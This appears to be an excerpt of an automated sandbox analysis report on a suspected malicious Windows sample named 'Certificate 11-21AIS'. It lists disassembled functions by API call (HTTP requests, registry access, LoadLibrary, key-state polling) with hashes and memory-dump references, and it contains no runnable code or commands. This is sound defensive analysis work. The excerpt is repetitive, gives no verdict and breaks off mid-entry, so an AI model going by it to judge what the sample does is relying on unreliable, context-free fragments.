                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009002C2
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00900344
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                              • String ID: DllGetClassObject
                                                                              • API String ID: 753597075-1075368562
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00905075
                                                                              • GetMenuItemInfoW.USER32 ref: 00905091
                                                                              • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009050D7
                                                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00981708,00000000), ref: 00905120
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              APIs
                                                                              • CharLowerBuffW.USER32(?,?,?,?), ref: 00920587
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharLower
                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                              • API String ID: 2358735015-567219261
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008FB88E
                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008FB8A1
                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 008FB8D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              APIs
                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00914401
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00914427
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00914457
                                                                              • InternetCloseHandle.WININET(00000000), ref: 0091449E
                                                                                • Part of subcall function 00915052: GetLastError.KERNEL32(?,?,009143CC,00000000,00000000,00000001), ref: 00915067
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                              • String ID:
                                                                              • API String ID: 1951874230-3916222277
                                                                              APIs
                                                                                • Part of subcall function 008DD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                                • Part of subcall function 008DD17C: GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                                • Part of subcall function 008DD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0092915C
                                                                              • LoadLibraryW.KERNEL32(?), ref: 00929163
                                                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00929178
                                                                              • DestroyWindow.USER32(?), ref: 00929180
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 4146253029-1011021900
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00909588
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009095B9
                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 009095CB
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00909605
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 8fd3b0d74784c0f4078d1fbc183fe911169f0f8d767c64841e758b4fedba9f79
                                                                              • Instruction ID: f9aa338dc97e7ee01ff22b217521e081ccca4e0365d6be3dd55763d7c81cfa42
                                                                              • Opcode Fuzzy Hash: 8fd3b0d74784c0f4078d1fbc183fe911169f0f8d767c64841e758b4fedba9f79
                                                                              • Instruction Fuzzy Hash: 1F216D74600205AFEB259F2ADC45E9E7BF8AF85724F204A19FDA1D72E2D770D940DB20
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00909653
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00909683
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00909694
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009096CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 07ca8bbf6a02d7b3636f61bfdfb1bf8154aa4147a35ee0aa177ba9053a0d499d
                                                                              • Instruction ID: 69c23c6d4a7acf002ca4dfda2129709033da78c34d324fcfa0ec68637f778511
                                                                              • Opcode Fuzzy Hash: 07ca8bbf6a02d7b3636f61bfdfb1bf8154aa4147a35ee0aa177ba9053a0d499d
                                                                              • Instruction Fuzzy Hash: 19217F75600215AFDB249F699C44E9A77ECAF85B24F200A19F8A1E72D1E7B29841CB50
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090DB0A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0090DB5E
                                                                              • __swprintf.LIBCMT ref: 0090DB77
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0095DC00), ref: 0090DBB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: 8764657dfa8c86ce9ec559041d6356d105a3108ae4bc38406688469c83198b81
                                                                              • Instruction ID: d954a4af16a82b7417c02eab3f40b262b6e21aaa1f81e0bae8d7667d51ba1962
                                                                              • Opcode Fuzzy Hash: 8764657dfa8c86ce9ec559041d6356d105a3108ae4bc38406688469c83198b81
                                                                              • Instruction Fuzzy Hash: 83219835600108AFCB10EFA9CD85EAEBBF8FF89704B004069F909D7251DB70EA41DB61
                                                                              APIs
                                                                                • Part of subcall function 008FC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008FC84A
                                                                                • Part of subcall function 008FC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008FC85D
                                                                                • Part of subcall function 008FC82D: GetCurrentThreadId.KERNEL32 ref: 008FC864
                                                                                • Part of subcall function 008FC82D: AttachThreadInput.USER32(00000000), ref: 008FC86B
                                                                              • GetFocus.USER32 ref: 008FCA05
                                                                                • Part of subcall function 008FC876: GetParent.USER32(?), ref: 008FC884
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 008FCA4E
                                                                              • EnumChildWindows.USER32(?,008FCAC4), ref: 008FCA76
                                                                              • __swprintf.LIBCMT ref: 008FCA90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                              • String ID: %s%d
                                                                              • API String ID: 3187004680-1110647743
                                                                              • Opcode ID: 9fec25f61a55d3d2712cb7b80edaab52b2fe81d9ed0f2aa6ff5117966c28ab16
                                                                              • Instruction ID: 21e6cded77075c059bd617a53a3d39cfd3c0e3b60f1e7adc6b66cc002155b454
                                                                              • Opcode Fuzzy Hash: 9fec25f61a55d3d2712cb7b80edaab52b2fe81d9ed0f2aa6ff5117966c28ab16
                                                                              • Instruction Fuzzy Hash: 6811ACB561021C6ACB01AFA48D89FB93B68FB45704F00807AFB08EA082DB70A645DB71
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009219F3
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00921A26
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00921B49
                                                                              • CloseHandle.KERNEL32(?), ref: 00921BBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 0cbadd16866f8ef3a04e3d33cfe7a40b59454df5143dd15842f95b75194d9438
                                                                              • Instruction ID: 46ba085e8b5dfdf9a311b3a3c7661ed1015ac43635b664018fbebc575a786951
                                                                              • Opcode Fuzzy Hash: 0cbadd16866f8ef3a04e3d33cfe7a40b59454df5143dd15842f95b75194d9438
                                                                              • Instruction Fuzzy Hash: 8081A174600210ABDF10AF68D886BADBBF5FF08720F14845AF905AF386D7B4ED418B91
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 00901CB4
                                                                              • VariantClear.OLEAUT32(00000013), ref: 00901D26
                                                                              • VariantClear.OLEAUT32(00000000), ref: 00901D81
                                                                              • VariantClear.OLEAUT32(?), ref: 00901DF8
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00901E26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                              • String ID:
                                                                              • API String ID: 4136290138-0
                                                                              • Opcode ID: fa964e92856139fe1a4e19f8dc3a2e0d733ccd1db769963f7e2fa53e9df7a41e
                                                                              • Instruction ID: e1720753b27fd9f5fc3baaf4fefdf5ebe2d2d7aa29ee3cbd11e24dd713c7c1c4
                                                                              • Opcode Fuzzy Hash: fa964e92856139fe1a4e19f8dc3a2e0d733ccd1db769963f7e2fa53e9df7a41e
                                                                              • Instruction Fuzzy Hash: D3514AB9A00209EFDB14CF58C884EAAB7B8FF4D314B158559E959DB390D334E951CFA0
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009206EE
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0092077D
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0092079B
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009207E1
                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 009207FB
                                                                                • Part of subcall function 008DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0090A574,?,?,00000000,00000008), ref: 008DE675
                                                                                • Part of subcall function 008DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0090A574,?,?,00000000,00000008), ref: 008DE699
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 327935632-0
                                                                              • Opcode ID: f09fa2dfae4d1ad6fe01c3b622d01f31e37347e032ff2b28ac4cfada8ce59425
                                                                              • Instruction ID: 3cb50041936990130f0f3bedf58311ec68cc9bfa1e2ed2bfde303fe3ce65374e
                                                                              • Opcode Fuzzy Hash: f09fa2dfae4d1ad6fe01c3b622d01f31e37347e032ff2b28ac4cfada8ce59425
                                                                              • Instruction Fuzzy Hash: 07514B79A00215DFCB00EFA8D885EADB7B9FF59310B048069E915EB352DB34ED45CB81
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00922EEF
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00922F2E
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00922F75
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00922FA1
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00922FAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 3740051246-0
                                                                              • Opcode ID: df6c11b32f214ec2f6358cf043ab3d509017e0204e5817f126bec2965ab2d362
                                                                              • Instruction ID: b14a5bbd51ff5bcfd53d3b59e4ad99fbc9722d00b933ba6462975d9b25e602db
                                                                              • Opcode Fuzzy Hash: df6c11b32f214ec2f6358cf043ab3d509017e0204e5817f126bec2965ab2d362
                                                                              • Instruction Fuzzy Hash: EA514871208204AFD704EF68D991FAABBF9FF88314F04892DF595972A1DB34E904DB52
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 04d9417f7d3cd0136329e40238a3174b19391481b2b14325db2a62e8f5a349ab
                                                                              • Instruction ID: c117bc321107185b1d0e82d8ffebc3fd0221ebc4592cf2276f9c04fe9d9dcecb
                                                                              • Opcode Fuzzy Hash: 04d9417f7d3cd0136329e40238a3174b19391481b2b14325db2a62e8f5a349ab
                                                                              • Instruction Fuzzy Hash: BB41F3B9A05224AFC720DF68EC44FADBB6CEB09310F150265F959A72E5C730AD01DB90
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009112B4
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009112DD
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0091131C
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00911341
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00911349
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1389676194-0
                                                                              • Opcode ID: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
                                                                              • Instruction ID: 9489f57cb405a29b52144c6a8ca249252f89655c2d49af15c3630fb94213c75e
                                                                              • Opcode Fuzzy Hash: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
                                                                              • Instruction Fuzzy Hash: 16411C35A00109EFCB01EF68C985EADBBF5FF49310B148099E95AAB361CB31ED41DB51
                                                                              APIs
                                                                              • GetCursorPos.USER32(000000FF), ref: 008DB64F
                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 008DB66C
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 008DB691
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 008DB69F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: 8d113cdf7bd71468cf78ad58b1ee824724d2abde26cf7f73d8c81e9a71957534
                                                                              • Instruction ID: 2ad481420c9c2ebbf5e69b62e10cc415792228754a3b48d848709bca6efe343f
                                                                              • Opcode Fuzzy Hash: 8d113cdf7bd71468cf78ad58b1ee824724d2abde26cf7f73d8c81e9a71957534
                                                                              • Instruction Fuzzy Hash: 0741AE34509119FBDF199F68D884AE9BBB4FB05324F11431AF82992290CB34AD90DFA1
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 008FB369
                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 008FB413
                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008FB41B
                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 008FB429
                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008FB431
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
